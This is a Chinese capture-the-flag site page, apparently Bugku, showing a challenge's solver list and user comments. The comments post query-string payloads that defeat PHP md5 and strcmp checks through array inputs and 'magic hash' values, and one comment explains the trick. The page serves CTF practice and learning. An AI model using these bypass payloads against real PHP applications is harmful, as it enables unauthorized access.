评分(14)
解题动态
CN19169645762 攻破了该题 7小时前
ggsea 攻破了该题 7小时前
rorer 攻破了该题 9小时前
billy856 攻破了该题 18小时前
rschei7 攻破了该题 20小时前
zwx1998 攻破了该题 1天前
uliy 攻破了该题 1天前
懒懒懒大王 攻破了该题 1天前
假若今夜来临 攻破了该题 1天前
yiyiyiyi0108 攻破了该题 1天前
w84jhjfa9 攻破了该题 2天前
heinic 攻破了该题 2天前
qizhe 攻破了该题 3天前
zhzuo 攻破了该题 3天前
YXL520 攻破了该题 3天前
乌鲁鲁堵桥 攻破了该题 4天前
香蕉高手 攻破了该题 4天前
Goodboy 攻破了该题 4天前
dfagadgafafa 攻破了该题 4天前
评论
ggsea 7小时前
举报
查看源码发现code.txt,构造?v1[]=1&v2[]=2&v3[]=1参数
香蕉高手 4天前
举报
?v1[]=1&v2[]=2&v3[]=anything
WWls= 25天前
举报
?v1[]=1&v2[]=12&v3[]=1 直接这样简单点不更好吗
miosrfmoire 1月前
举报
作者前女友是bugku吗,最后flag里面解码还有小彩蛋
公良棉 1月前
举报
首先CTRL+U打开源码,看到PHP代码,意思叫我们输入v1、v2、v3三个元素,v1、v2没什么好说的,可以见其他评论,然后if(!strcmp($v3, $flag))等价于if(v3 == flag字符串),我们可以利用 strcmp 漏洞原理,让输入的v3为一个数组(内容是什么不重要),这个时候strcmp会返回Null,而!Null=True,就拿到了flag
沈芷意 1月前
举报
?v1=QNKCDZO&v2=s878926199a&v3[]=1
syhaisy 2月前
举报
?v1=QNKCDZO&v2=240610708&v3[]=1
准备夺冠 3月前
举报
?v1[]=1&v2[]=2&v3[]=3
kitniu 3月前
举报
GET /?v1[]=5&v2[]=3&v3[]=1 HTTP/1.1
smartada 4月前
举报
http://171.80.2.169:12317/?v1[]=1&v2[]=2&v3[]=1111